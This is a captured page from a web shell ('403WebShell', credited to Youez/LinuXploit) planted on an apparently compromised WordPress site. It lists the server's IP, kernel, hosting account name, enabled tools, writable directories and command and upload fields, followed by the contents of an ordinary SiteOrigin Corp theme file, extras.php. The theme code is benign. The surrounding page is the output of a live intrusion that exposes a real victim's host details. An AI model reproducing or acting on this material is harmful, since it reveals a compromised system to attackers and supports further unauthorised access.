Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.222.108.185
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/misswavenigeria.com/wp-content/themes/siteorigin-corp/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/misswavenigeria.com/wp-content/themes/siteorigin-corp/inc/extras.php
<?php
/**
 * Custom functions that act independently of the theme templates.
 *
 * Eventually, some of the functionality here could be replaced by core features.
 *
 * @license GPL 2.0
 */

/**
 * Adds custom classes to the array of body classes.
 *
 * @param array $classes Classes for the body element.
 *
 * @return array
 */
function siteorigin_corp_body_classes( $classes ) {
	global $post;

	// Blog settings.
	if ( siteorigin_setting( 'blog_archive_content' ) == 'full' ) {
		$classes[] = 'blog-full';
	}

	// Header margin.
	if ( is_home() && siteorigin_corp_has_featured_posts() ) {
		$classes[] = 'no-header-margin';
	}

	// Mobile compatibility classes.
	$classes[] = 'css3-animations';
	$classes[] = 'no-js';

	// Non-singlar pages.
	if ( ! is_singular() ) {
		$classes[] = 'hfeed';
	}

	// Page settings.
	$page_settings = siteorigin_page_setting();

	if ( ! empty( $page_settings ) ) {
		if ( ! empty( $page_settings['layout'] ) ) {
			$classes[] = 'page-layout-' . $page_settings['layout'];
		}

		if ( ! empty( $page_settings['overlap'] ) && ( $page_settings['overlap'] != 'disabled' ) ) {
			$classes[] = 'overlap-' . $page_settings['overlap'];
		}

		if ( empty( $page_settings['header_margin'] ) ) {
			$classes[] = 'no-header-margin';
		}

		if ( empty( $page_settings['footer_margin'] ) ) {
			$classes[] = 'no-footer-margin';
		}


		if (
			isset( $page_settings['header'] ) &&
			empty( $page_settings['header'] )
		) {
			$classes[] = 'page-layout-hide-header';
		}
		if (
			isset( $page_settings['footer'] ) &&
			empty( $page_settings['footer'] )
		) {
			$classes[] = 'page-layout-hide-footer';
		}
	}

	// Sidebar.
	if ( is_active_sidebar( 'sidebar-main' ) && ! is_404() && ! ( function_exists( 'is_woocommerce' ) && is_woocommerce() ) ) {
		$classes[] = 'sidebar';
	}

	if ( siteorigin_setting( 'sidebar_position' ) == 'left' && ! is_404() && ! ( function_exists( 'is_woocommerce' ) && is_woocommerce() ) ) {
		$classes[] = 'sidebar-left';
	}

	// WooCommerce top bar.
	if ( class_exists( 'Woocommerce' ) && ! is_store_notice_showing() ) {
		$classes[] = 'no-topbar';
	} elseif ( ! class_exists( 'Woocommerce' ) ) {
		$classes[] = 'no-topbar';
	}

	// WooCommerce sidebar.
	if ( is_active_sidebar( 'shop-sidebar' ) && ( function_exists( 'is_woocommerce' ) && is_woocommerce() && siteorigin_page_setting( 'layout' ) == 'default' && ! is_product() ) ) {
		$classes[] = 'woocommerce-sidebar';

		if ( siteorigin_setting( 'woocommerce_shop_sidebar' ) == 'left' ) {
			$classes[] = 'woocommerce-sidebar-left';
		}
	}

	// WooCommerce archive Quick View and Add to Cart.
	if (
		function_exists( 'is_woocommerce' ) &&
		(
			is_woocommerce() ||
			is_cart() ||
			wc_post_content_has_shortcode( 'products' ) ||
			(
				! empty( $post ) &&
				! empty( $post->post_content ) &&
				strpos( $post->post_content, 'woocommerce-loop-product__link' ) !== false
			)
		) &&
		(
			siteorigin_setting( 'woocommerce_quick_view' ) &&
			siteorigin_setting( 'woocommerce_quick_view_location' ) == 'hover' ||
			siteorigin_setting( 'woocommerce_add_to_cart' ) &&
			siteorigin_setting( 'woocommerce_add_to_cart_location' ) == 'hover'
		)
	) {
		$classes[] = 'woocommerce-product-overlay';
	}

	return $classes;
}
add_filter( 'body_class', 'siteorigin_corp_body_classes' );

/**
 * Add a pingback url auto-discovery header for singularly identifiable articles.
 */
function siteorigin_corp_pingback_header() {
	if ( is_singular() && pings_open() ) {
		echo '<link rel="pingback" href="', esc_url( get_bloginfo( 'pingback_url' ) ), '">';
	}
}
add_action( 'wp_head', 'siteorigin_corp_pingback_header' );

if ( ! function_exists( 'siteorigin_corp_unset_current_menu_class' ) ) {
	/**
	 * Unset the current menu class.
	 */
	function siteorigin_corp_unset_current_menu_class( $classes ) {
		$disallowed_class_names = array(
			'current-menu-item',
			'current_page_item',
		);

		foreach ( $classes as $class ) {
			if ( in_array( $class, $disallowed_class_names ) ) {
				$key = array_search( $class, $classes );

				if ( false !== $key ) {
					unset( $classes[$key] );
				}
			}
		}

		return $classes;
	}
}
add_filter( 'nav_menu_css_class', 'siteorigin_corp_unset_current_menu_class', 10, 1 );

if ( ! function_exists( 'siteorigin_corp_post_class_filter' ) ) {
	/**
	 * Filter post classes as required.
	 *
	 * @see https://codex.wordpress.org/Function_Reference/post_class.
	 */
	function siteorigin_corp_post_class_filter( $classes ) {
		$classes[] = 'post';

		// Resolves structured data issue in core. See https://core.trac.wordpress.org/ticket/28482.
		if ( is_page() ) {
			$class_key = array_search( 'hentry', $classes );

			if ( $class_key !== false ) {
				unset( $classes[ $class_key ] );
			}
		}

		$classes = array_unique( $classes );
		return $classes;
	}
}
add_filter( 'post_class', 'siteorigin_corp_post_class_filter' );

Youez - 2016 - github.com/yon3zu
LinuXploit